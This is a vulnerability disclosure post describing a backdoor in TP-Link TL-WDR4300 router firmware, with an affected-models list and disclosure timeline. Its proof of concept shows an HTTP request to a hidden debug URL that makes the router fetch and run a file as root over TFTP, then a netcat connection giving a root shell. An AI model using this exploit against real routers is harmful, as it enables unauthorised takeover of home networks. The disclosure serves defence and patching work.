TP-Link http/tftp backdoor

About the TP-Link Router

TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.

Tested Firmware

We tested the remote root PoC on the newest firmware (published on 25.12.2012):

TL-WDR4300 – tested firmware version
The following info is provided for educational use only!

Update: more info about the issues in the router is available here.
Proof of Concept

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html –2013-03-09 23:22:31– http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html
Connecting to 192.168.0.1:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [text/html]
Saving to: “start_art.html”

[ <=> ] 426 –.-K/s in 0s

2013-03-09 23:22:33 (49.1 MB/s) – “start_art.html” saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
PID Uid VmSize Stat Command
1 root 404 S init
2 root SW< [kthreadd] 3 root SW< [ksoftirqd/0] 4 root SW< [events/0] 5 root SW< [khelper] 6 root SW< [async/mgr] 7 root SW< [kblockd/0] 8 root SW [pdflush] 9 root SW [pdflush] 10 root SW< [kswapd0] 17 root SW< [mtdblockd] 18 root SW< [unlzma/0] 71 root 2768 S /usr/bin/httpd 76 root 380 S /sbin/getty ttyS0 115200 78 root 208 S ipcserver 82 root 2768 S /usr/bin/httpd 83 root 2768 S /usr/bin/httpd 86 root 732 S ushare -d -x -f /tmp/ushare.conf 92 root 348 S syslogd -C -l 7 96 root 292 S klogd 101 root SW< [napt_ct_scan] 246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf 286 root 2768 S /usr/bin/httpd 299 root 2768 S /usr/bin/httpd 300 root 2768 S /usr/bin/httpd 305 root 2768 S /usr/bin/httpd 307 root 2768 S /usr/bin/httpd 309 root 2768 S /usr/bin/httpd 310 root 2768 S /usr/bin/httpd 389 root 2768 S /usr/bin/httpd Details After the following HTTP request is sent: http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html the router downloads a file (nart.out) from the host which has issed the http request and executes is as root: PoC – diagram Sample captures from the host which issues the http request: Wireshark filter used to show router tftp traffic nart.out tftp request Models affected TL-WDR4300 TL-WR743ND (v1.2 v2.0) … History of the bug 12.02.2013 – TP-Link e-mailed with details – no response 22.02.2013 – TP-Link again e-mailed with details – no response 12.03.2013 – public disclosure More information http://sekurak.pl/more-information-about-tp-link-backdoor/

评论关闭。